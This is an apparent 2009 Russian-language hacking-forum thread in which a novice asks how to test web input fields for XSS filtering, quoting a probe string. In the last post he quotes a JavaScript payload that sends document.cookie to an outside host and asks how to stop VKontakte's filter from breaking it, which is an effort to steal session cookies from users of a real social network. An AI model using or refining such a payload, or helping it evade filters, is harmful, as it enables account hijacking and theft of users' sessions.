фильтор

Discussion in 'Уязвимости Mail-сервисов' started by Plaf-di, 30 Mar 2009.

  1. Plaf-di

    Plaf-di New Member

    Joined:
    23 Mar 2009
    Messages:
    10
    Likes Received:
    4
    Reputations:
    -11
    извеняюсь если гдето это было я не нашёл...

    я прочитал:
    ### А как определить есть фильтр или нет?

    Просто в любое поле вводим: '';!--"<fuck>=&{()}
    Дальше открываем html страничку и ищем слово "fuck"
    и смотри ...........

    фильтрации вот так: "><>'"`,/\?@%

    и у меня вопрос....
    куда писать ';!--"<fuck>=&{()}
    да и вобще немоглибы по подробнее расказать про это?

    и ещё раз извеняюсь...
     
  2. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    В статье Микроба всё подробно описано, если мне память не изменяет это как раз из неё пример, почитай ещё статьи про XSS, понимание придёт со временем...
     
  3. Plaf-di

    Plaf-di New Member

    Joined:
    23 Mar 2009
    Messages:
    10
    Likes Received:
    4
    Reputations:
    -11
    m0Hze
    тоесть надо в любое место где можно в вести текст...
    а не в адресную строку.

    и ещё незнаете как сделать чтобы
    ...javascript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.cookie;</script>')...
    после того как отпровляешь вконтакте сообщении не стоновилось
    ...javas?1?ript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.?4??4??1?ki?1?;</script>')...
     
    #3 Plaf-di, 30 Mar 2009
    Last edited: 30 Mar 2009